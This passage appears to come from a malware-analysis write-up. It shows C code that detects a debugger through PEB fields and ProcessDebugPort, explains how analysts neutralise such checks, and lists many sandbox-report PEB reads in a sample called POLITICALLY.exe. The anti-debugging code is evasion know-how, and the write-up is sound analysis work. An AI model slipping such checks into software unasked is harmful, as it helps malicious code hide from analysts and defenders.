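    if (fn(GetCurrentProcess(), ProcessDebugPort, &port, sizeof(port), NULL) != 0) return -1;
    *port_out = (uintptr_t)port;
    return 0;
}

/* The "mov eax, dword ptr fs:[00000030h]" reads: fs:[30h] is
 * TEB->ProcessEnvironmentBlock in a 32-bit process (gs:[60h] on x64).
 * NtGlobalFlag sits at PEB+0x68 on x86 and PEB+0xBC on x64. */
void read_peb_debug_fields(unsigned char *being_debugged, uint32_t *nt_global_flag)
{
    const unsigned char *peb = (const unsigned char *)NtCurrentTeb()->ProcessEnvironmentBlock;
#ifdef _WIN64
    const size_t ntgf_offset = 0xBC;
#else
    const size_t ntgf_offset = 0x68;
#endif
    *being_debugged = peb[2];
    *nt_global_flag = *(const uint32_t *)(peb + ntgf_offset);
}
#endif

int main(void)
{
#ifdef _WIN32
    unsigned char bd = 0; uint32_t ntgf = 0; uintptr_t port = 0;
    read_peb_debug_fields(&bd, &ntgf);
    query_debug_port(&port);
    printf("BeingDebugged=%u NtGlobalFlag=0x%08x DebugPort=%s\n",
           (unsigned)bd, ntgf, debug_port_indicates_debugger(port) ? "set" : "0");
    printf("verdict: %s\n",
           (being_debugged_set(bd) || ntglobalflag_indicates_debugger(ntgf)
            || debug_port_indicates_debugger(port)) ? "debugger" : "clean");
#else
    puts("Windows-only live checks skipped; decoders still usable");
#endif
    return 0;
}
```

When debugging a sample that does this, the practical counter is to hook the two native calls (return success from NtSetInformationThread without applying the class, return 0 for ProcessDebugPort) and patch the PEB fields, which is exactly what anti-anti-debug plugins do; the sandbox report's value is that it shows the calls were made even though the checks themselves were neutralised.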
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02221066 LdrInitializeThunk, 2_2_02221066
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02219212 mov eax, dword ptr fs:[00000030h] 2_2_02219212
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222C0B8 mov eax, dword ptr fs:[00000030h] 2_2_0222C0B8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02219102 mov eax, dword ptr fs:[00000030h] 2_2_02219102
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222C1F4 mov eax, dword ptr fs:[00000030h] 2_2_0222C1F4
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222767D mov eax, dword ptr fs:[00000030h] 2_2_0222767D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_022197E8 mov eax, dword ptr fs:[00000030h] 2_2_022197E8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_022197DF mov eax, dword ptr fs:[00000030h] 2_2_022197DF
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222440F mov eax, dword ptr fs:[00000030h] 2_2_0222440F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222C444 mov eax, dword ptr fs:[00000030h] 2_2_0222C444
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02217A2E mov eax, dword ptr fs:[00000030h] 2_2_02217A2E
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_02219917 mov eax, dword ptr fs:[00000030h] 2_2_02219917
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0222BFB8 mov eax, dword ptr fs:[00000030h] 2_2_0222BFB8
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 2_2_0221CD2F mov eax, dword ptr fs:[00000030h] 2_2_0221CD2F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23E620 mov eax, dword ptr fs:[00000030h] 10_2_1E23E620
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2EFE3F mov eax, dword ptr fs:[00000030h] 10_2_1E2EFE3F
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h] 10_2_1E23C600
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h] 10_2_1E23C600
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23C600 mov eax, dword ptr fs:[00000030h] 10_2_1E23C600
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E268E00 mov eax, dword ptr fs:[00000030h] 10_2_1E268E00
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1608 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1608
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A61C mov eax, dword ptr fs:[00000030h] 10_2_1E26A61C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A61C mov eax, dword ptr fs:[00000030h] 10_2_1E26A61C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24766D mov eax, dword ptr fs:[00000030h] 10_2_1E24766D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25AE73 mov eax, dword ptr fs:[00000030h] 10_2_1E25AE73
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E247E41 mov eax, dword ptr fs:[00000030h] 10_2_1E247E41
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FAE44 mov eax, dword ptr fs:[00000030h] 10_2_1E2FAE44
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FAE44 mov eax, dword ptr fs:[00000030h] 10_2_1E2FAE44
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B46A7 mov eax, dword ptr fs:[00000030h] 10_2_1E2B46A7
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h] 10_2_1E300EA5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h] 10_2_1E300EA5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E300EA5 mov eax, dword ptr fs:[00000030h] 10_2_1E300EA5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CFE87 mov eax, dword ptr fs:[00000030h] 10_2_1E2CFE87
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2616E0 mov ecx, dword ptr fs:[00000030h] 10_2_1E2616E0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2476E2 mov eax, dword ptr fs:[00000030h] 10_2_1E2476E2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E278EC7 mov eax, dword ptr fs:[00000030h] 10_2_1E278EC7
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308ED6 mov eax, dword ptr fs:[00000030h] 10_2_1E308ED6
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2636CC mov eax, dword ptr fs:[00000030h] 10_2_1E2636CC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2EFEC0 mov eax, dword ptr fs:[00000030h] 10_2_1E2EFEC0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E234F2E mov eax, dword ptr fs:[00000030h] 10_2_1E234F2E
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E234F2E mov eax, dword ptr fs:[00000030h] 10_2_1E234F2E
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26E730 mov eax, dword ptr fs:[00000030h] 10_2_1E26E730
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A70E mov eax, dword ptr fs:[00000030h] 10_2_1E26A70E
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A70E mov eax, dword ptr fs:[00000030h] 10_2_1E26A70E
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25F716 mov eax, dword ptr fs:[00000030h] 10_2_1E25F716
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CFF10 mov eax, dword ptr fs:[00000030h] 10_2_1E2CFF10
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CFF10 mov eax, dword ptr fs:[00000030h] 10_2_1E2CFF10
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30070D mov eax, dword ptr fs:[00000030h] 10_2_1E30070D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30070D mov eax, dword ptr fs:[00000030h] 10_2_1E30070D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24FF60 mov eax, dword ptr fs:[00000030h] 10_2_1E24FF60
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308F6A mov eax, dword ptr fs:[00000030h] 10_2_1E308F6A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24EF40 mov eax, dword ptr fs:[00000030h] 10_2_1E24EF40
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E248794 mov eax, dword ptr fs:[00000030h] 10_2_1E248794
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h] 10_2_1E2B7794
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h] 10_2_1E2B7794
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B7794 mov eax, dword ptr fs:[00000030h] 10_2_1E2B7794
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2737F5 mov eax, dword ptr fs:[00000030h] 10_2_1E2737F5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26BC2C mov eax, dword ptr fs:[00000030h] 10_2_1E26BC2C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h] 10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h] 10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h] 10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6C0A mov eax, dword ptr fs:[00000030h] 10_2_1E2B6C0A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F1C06 mov eax, dword ptr fs:[00000030h] 10_2_1E2F1C06
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h] 10_2_1E30740D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h] 10_2_1E30740D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E30740D mov eax, dword ptr fs:[00000030h] 10_2_1E30740D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25746D mov eax, dword ptr fs:[00000030h] 10_2_1E25746D
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26A44B mov eax, dword ptr fs:[00000030h] 10_2_1E26A44B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CC450 mov eax, dword ptr fs:[00000030h] 10_2_1E2CC450
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2CC450 mov eax, dword ptr fs:[00000030h] 10_2_1E2CC450
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24849B mov eax, dword ptr fs:[00000030h] 10_2_1E24849B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F14FB mov eax, dword ptr fs:[00000030h] 10_2_1E2F14FB
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6CF0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6CF0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6CF0 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6CF0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308CD6 mov eax, dword ptr fs:[00000030h] 10_2_1E308CD6
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308D34 mov eax, dword ptr fs:[00000030h] 10_2_1E308D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E243D34 mov eax, dword ptr fs:[00000030h] 10_2_1E243D34
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23AD30 mov eax, dword ptr fs:[00000030h] 10_2_1E23AD30
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FE539 mov eax, dword ptr fs:[00000030h] 10_2_1E2FE539
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2BA537 mov eax, dword ptr fs:[00000030h] 10_2_1E2BA537
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h] 10_2_1E264D3B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h] 10_2_1E264D3B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E264D3B mov eax, dword ptr fs:[00000030h] 10_2_1E264D3B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25C577 mov eax, dword ptr fs:[00000030h] 10_2_1E25C577
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E25C577 mov eax, dword ptr fs:[00000030h] 10_2_1E25C577
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E273D43 mov eax, dword ptr fs:[00000030h] 10_2_1E273D43
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B3540 mov eax, dword ptr fs:[00000030h] 10_2_1E2B3540
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2E3D40 mov eax, dword ptr fs:[00000030h] 10_2_1E2E3D40
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E257D50 mov eax, dword ptr fs:[00000030h] 10_2_1E257D50
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2635A1 mov eax, dword ptr fs:[00000030h] 10_2_1E2635A1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h] 10_2_1E261DB5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h] 10_2_1E261DB5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E261DB5 mov eax, dword ptr fs:[00000030h] 10_2_1E261DB5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3005AC mov eax, dword ptr fs:[00000030h] 10_2_1E3005AC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E3005AC mov eax, dword ptr fs:[00000030h] 10_2_1E3005AC
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h] 10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h] 10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h] 10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262581 mov eax, dword ptr fs:[00000030h] 10_2_1E262581
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h] 10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h] 10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h] 10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h] 10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E232D8A mov eax, dword ptr fs:[00000030h] 10_2_1E232D8A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26FD9B mov eax, dword ptr fs:[00000030h] 10_2_1E26FD9B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26FD9B mov eax, dword ptr fs:[00000030h] 10_2_1E26FD9B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24D5E0 mov eax, dword ptr fs:[00000030h] 10_2_1E24D5E0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24D5E0 mov eax, dword ptr fs:[00000030h] 10_2_1E24D5E0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_1E2FFDE2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_1E2FFDE2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_1E2FFDE2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FFDE2 mov eax, dword ptr fs:[00000030h] 10_2_1E2FFDE2
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2E8DF1 mov eax, dword ptr fs:[00000030h] 10_2_1E2E8DF1
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov ecx, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2B6DC9 mov eax, dword ptr fs:[00000030h] 10_2_1E2B6DC9
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E274A2C mov eax, dword ptr fs:[00000030h] 10_2_1E274A2C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E274A2C mov eax, dword ptr fs:[00000030h] 10_2_1E274A2C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E248A0A mov eax, dword ptr fs:[00000030h] 10_2_1E248A0A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h] 10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E235210 mov ecx, dword ptr fs:[00000030h] 10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h] 10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E235210 mov eax, dword ptr fs:[00000030h] 10_2_1E235210
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23AA16 mov eax, dword ptr fs:[00000030h] 10_2_1E23AA16
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23AA16 mov eax, dword ptr fs:[00000030h] 10_2_1E23AA16
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E253A1C mov eax, dword ptr fs:[00000030h] 10_2_1E253A1C
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FAA16 mov eax, dword ptr fs:[00000030h] 10_2_1E2FAA16
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FAA16 mov eax, dword ptr fs:[00000030h] 10_2_1E2FAA16
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2EB260 mov eax, dword ptr fs:[00000030h] 10_2_1E2EB260
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2EB260 mov eax, dword ptr fs:[00000030h] 10_2_1E2EB260
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308A62 mov eax, dword ptr fs:[00000030h] 10_2_1E308A62
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E27927A mov eax, dword ptr fs:[00000030h] 10_2_1E27927A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h] 10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h] 10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h] 10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E239240 mov eax, dword ptr fs:[00000030h] 10_2_1E239240
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2FEA55 mov eax, dword ptr fs:[00000030h] 10_2_1E2FEA55
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2C4257 mov eax, dword ptr fs:[00000030h] 10_2_1E2C4257
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2352A5 mov eax, dword ptr fs:[00000030h] 10_2_1E2352A5
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24AAB0 mov eax, dword ptr fs:[00000030h] 10_2_1E24AAB0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E24AAB0 mov eax, dword ptr fs:[00000030h] 10_2_1E24AAB0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26FAB0 mov eax, dword ptr fs:[00000030h] 10_2_1E26FAB0
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26D294 mov eax, dword ptr fs:[00000030h] 10_2_1E26D294
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E26D294 mov eax, dword ptr fs:[00000030h] 10_2_1E26D294
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262AE4 mov eax, dword ptr fs:[00000030h] 10_2_1E262AE4
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E262ACB mov eax, dword ptr fs:[00000030h] 10_2_1E262ACB
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E2F131B mov eax, dword ptr fs:[00000030h] 10_2_1E2F131B
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23DB60 mov ecx, dword ptr fs:[00000030h] 10_2_1E23DB60
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E263B7A mov eax, dword ptr fs:[00000030h] 10_2_1E263B7A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E263B7A mov eax, dword ptr fs:[00000030h] 10_2_1E263B7A
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23DB40 mov eax, dword ptr fs:[00000030h] 10_2_1E23DB40
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E308B58 mov eax, dword ptr fs:[00000030h] 10_2_1E308B58
Source: C:\Users\user\Desktop\POLITICALLY.exe Code function: 10_2_1E23F358 mov eax, dword ptr fs:[00000030h] 10_2_1E23F358
